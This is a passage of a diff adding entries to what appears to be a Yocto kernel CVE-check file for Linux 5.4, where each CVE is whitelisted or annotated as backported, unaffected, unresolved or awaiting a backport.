+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26141"
+
+# CVE-2020-26142 has no known resolution
+
+# CVE-2020-26143 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26145"
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2020-26147"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2020-26541"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26555"
+
+# CVE-2020-26556 has no known resolution
+
+# CVE-2020-26557 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2020-26558"
+
+# CVE-2020-26559 has no known resolution
+
+# CVE-2020-26560 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2020-27066"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2020-27067"
+
+# cpe-stable-backport: Backported in 5.4.24
+CVE_CHECK_WHITELIST += "CVE-2020-27068"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27152"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27170"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27171"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-27194"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-2732"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-27418"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27673"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27675"
+
+# cpe-stable-backport: Backported in 5.4.75
+CVE_CHECK_WHITELIST += "CVE-2020-27777"
+
+# cpe-stable-backport: Backported in 5.4.73
+CVE_CHECK_WHITELIST += "CVE-2020-27784"
+
+# cpe-stable-backport: Backported in 5.4.42
+CVE_CHECK_WHITELIST += "CVE-2020-27786"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-27815"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2020-27820"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2020-27825"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-27830"
+
+# CVE-2020-27835 needs backporting (fixed from 5.10rc6)
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-28097"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2020-28374"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-28588"
+
+# cpe-stable-backport: Backported in 5.4.71
+CVE_CHECK_WHITELIST += "CVE-2020-28915"
+
+# cpe-stable-backport: Backported in 5.4.80
+CVE_CHECK_WHITELIST += "CVE-2020-28941"
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-28974"
+
+# cpe-stable-backport: Backported in 5.4.48
+CVE_CHECK_WHITELIST += "CVE-2020-29368"
+
+# cpe-stable-backport: Backported in 5.4.54
+CVE_CHECK_WHITELIST += "CVE-2020-29369"
+
+# cpe-stable-backport: Backported in 5.4.27
+CVE_CHECK_WHITELIST += "CVE-2020-29370"
+
+# cpe-stable-backport: Backported in 5.4.61
+CVE_CHECK_WHITELIST += "CVE-2020-29371"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-29372"
+
+# CVE-2020-29373 needs backporting (fixed from 5.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2020-29374"
+
+# CVE-2020-29534 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29568"
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-29569"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29660"
+
+# cpe-stable-backport: Backported in 5.4.83
+CVE_CHECK_WHITELIST += "CVE-2020-29661"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-35499"
+
+# CVE-2020-35501 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.76
+CVE_CHECK_WHITELIST += "CVE-2020-35508"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2020-35513"
+
+# cpe-stable-backport: Backported in 5.4.82
+CVE_CHECK_WHITELIST += "CVE-2020-35519"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36158"
+
+# CVE-2020-36310 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.131
+CVE_CHECK_WHITELIST += "CVE-2020-36311"
+
+# cpe-stable-backport: Backported in 5.4.66
+CVE_CHECK_WHITELIST += "CVE-2020-36312"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36313"
+
+# cpe-stable-backport: Backported in 5.4.88
+CVE_CHECK_WHITELIST += "CVE-2020-36322"
+
+# CVE-2020-36385 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.58
+CVE_CHECK_WHITELIST += "CVE-2020-36386"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36387"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2020-36516"
+
+# cpe-stable-backport: Backported in 5.4.30
+CVE_CHECK_WHITELIST += "CVE-2020-36557"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-36558"
+
+# CVE-2020-36691 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.86
+CVE_CHECK_WHITELIST += "CVE-2020-36694"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2020-36766"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2020-36775"
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36776"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2020-36777"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36778"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36779"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36780"
+
+# CVE-2020-36781 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36782"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36783"
+
+# CVE-2020-36784 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36785"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-36786"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2020-36787"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2020-3702"
+
+# cpe-stable-backport: Backported in 5.4.79
+CVE_CHECK_WHITELIST += "CVE-2020-4788"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2020-7053"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2020-8428"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8647"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8648"
+
+# cpe-stable-backport: Backported in 5.4.25
+CVE_CHECK_WHITELIST += "CVE-2020-8649"
+
+# cpe-stable-backport: Backported in 5.4.77
+CVE_CHECK_WHITELIST += "CVE-2020-8694"
+
+# CVE-2020-8832 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2020-8834"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2020-8835"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2020-8992"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9383"
+
+# cpe-stable-backport: Backported in 5.4.23
+CVE_CHECK_WHITELIST += "CVE-2020-9391"
+
+# cpe-stable-backport: Backported in 5.4.122
+CVE_CHECK_WHITELIST += "CVE-2021-0129"
+
+# cpe-stable-backport: Backported in 5.4.47
+CVE_CHECK_WHITELIST += "CVE-2021-0342"
+
+# CVE-2021-0399 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2021-0447"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-0448"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-0512"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2021-0605"
+
+# CVE-2021-0606 has no known resolution
+
+# CVE-2021-0695 has no known resolution
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-0707"
+
+# cpe-stable-backport: Backported in 5.4.137
+CVE_CHECK_WHITELIST += "CVE-2021-0920"
+
+# CVE-2021-0924 has no known resolution
+
+# CVE-2021-0929 needs backporting (fixed from 5.6rc1)
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2021-0935"
+
+# CVE-2021-0936 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-0937"
+
+# cpe-stable-backport: Backported in 5.4.84
+CVE_CHECK_WHITELIST += "CVE-2021-0938"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-0941"
+
+# CVE-2021-0961 has no known resolution
+
+# fixed-version: only affects 5.9rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-1048"
+
+# CVE-2021-20177 needs backporting (fixed from 5.5rc1)
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20194"
+
+# CVE-2021-20219 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20226"
+
+# CVE-2021-20239 needs backporting (fixed from 5.9rc1)
+
+# fixed-version: Fixed after version 4.5rc5
+CVE_CHECK_WHITELIST += "CVE-2021-20261"
+
+# fixed-version: Fixed after version 4.5rc3
+CVE_CHECK_WHITELIST += "CVE-2021-20265"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20268"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2021-20292"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-20317"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-20320"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-20321"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-20322"
+
+# cpe-stable-backport: Backported in 5.4.99
+CVE_CHECK_WHITELIST += "CVE-2021-21781"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-22543"
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-22555"
+
+# fixed-version: only affects 5.6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-22600"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-23133"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-23134"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2021-26401"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-26708"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26930"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26931"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26932"
+
+# CVE-2021-26934 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27363"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27364"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27365"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-28038"
+
+# fixed-version: only affects 5.9rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28039"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28375"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28660"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-28688"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28691"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28711"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28712"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28713"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28714"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28715"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28950"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28951"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28952"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28964"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28971"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28972"
+
+# cpe-stable-backport: Backported in 5.4.111
+CVE_CHECK_WHITELIST += "CVE-2021-29154"
+
+# CVE-2021-29155 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29264"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-29265"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29266"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29646"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29647"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29648"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29649"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29650"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29657"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-30002"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-30178"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-31440"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2021-3178"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-31829"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-31916"
+
+# CVE-2021-32078 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-32399"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-32606"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-33033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-33034"
+
+# CVE-2021-33061 needs backporting (fixed from 5.18rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-33098"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33135"
+
+# fixed-version: only affects 5.12rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33200"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2021-3347"
+
+# cpe-stable-backport: Backported in 5.4.95
+CVE_CHECK_WHITELIST += "CVE-2021-3348"
+
+# cpe-stable-backport: Backported in 5.4.139
+CVE_CHECK_WHITELIST += "CVE-2021-33624"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-33630"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-33631"
+
+# cpe-stable-backport: Backported in 5.4.205
+CVE_CHECK_WHITELIST += "CVE-2021-33655"
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2021-33656"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-33909"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3411"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2021-3428"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-3444"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-34556"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-34693"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-3483"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-34866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3489"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3490"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3491"
+
+# CVE-2021-3492 has no known resolution
+
+# CVE-2021-3493 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-34981"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3501"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-35039"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-3506"
+
+# CVE-2021-3542 has no known resolution
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3543"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-35477"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3564"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3573"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3587"
+
+# cpe-stable-backport: Backported in 5.4.98
+CVE_CHECK_WHITELIST += "CVE-2021-3600"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2021-3609"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2021-3612"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2021-3635"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3640"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3653"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-3655"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3656"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-3659"
+
+# CVE-2021-3669 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-3679"
+
+# CVE-2021-3714 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2021-3715"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-37159"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-3732"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3736"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3739"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-3743"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3744"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3752"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3753"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-37576"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2021-3759"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3760"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3764"
+
+# cpe-stable-backport: Backported in 5.4.157
+CVE_CHECK_WHITELIST += "CVE-2021-3772"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38160"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38166"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38198"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38199"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38200"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38201"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38202"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38203"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-38204"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38205"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38206"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38207"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-38208"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38209"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-38300"
+
+# CVE-2021-3847 has no known resolution
+
+# CVE-2021-3864 has no known resolution
+
+# CVE-2021-3892 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-3894"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3896"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-3923"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-39633"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-39634"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39636"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2021-39648"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-39656"
+
+# cpe-stable-backport: Backported in 5.4.93
+CVE_CHECK_WHITELIST += "CVE-2021-39657"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39685"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-39686"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39698"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2021-39711"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39713"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39714"
+
+# CVE-2021-39800 has no known resolution
+
+# CVE-2021-39801 has no known resolution
+
+# CVE-2021-39802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4001"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4002"
+
+# CVE-2021-4023 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4028"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4032"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2021-4037"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2021-40490"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-4083"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4090"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4093"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4095"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-41073"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-4135"
+
+# CVE-2021-4148 needs backporting (fixed from 5.15)
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-4149"
+
+# CVE-2021-4150 needs backporting (fixed from 5.15rc7)
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-4154"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-4155"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-4157"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2021-4159"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-41864"
+
+# cpe-stable-backport: Backported in 5.4.189
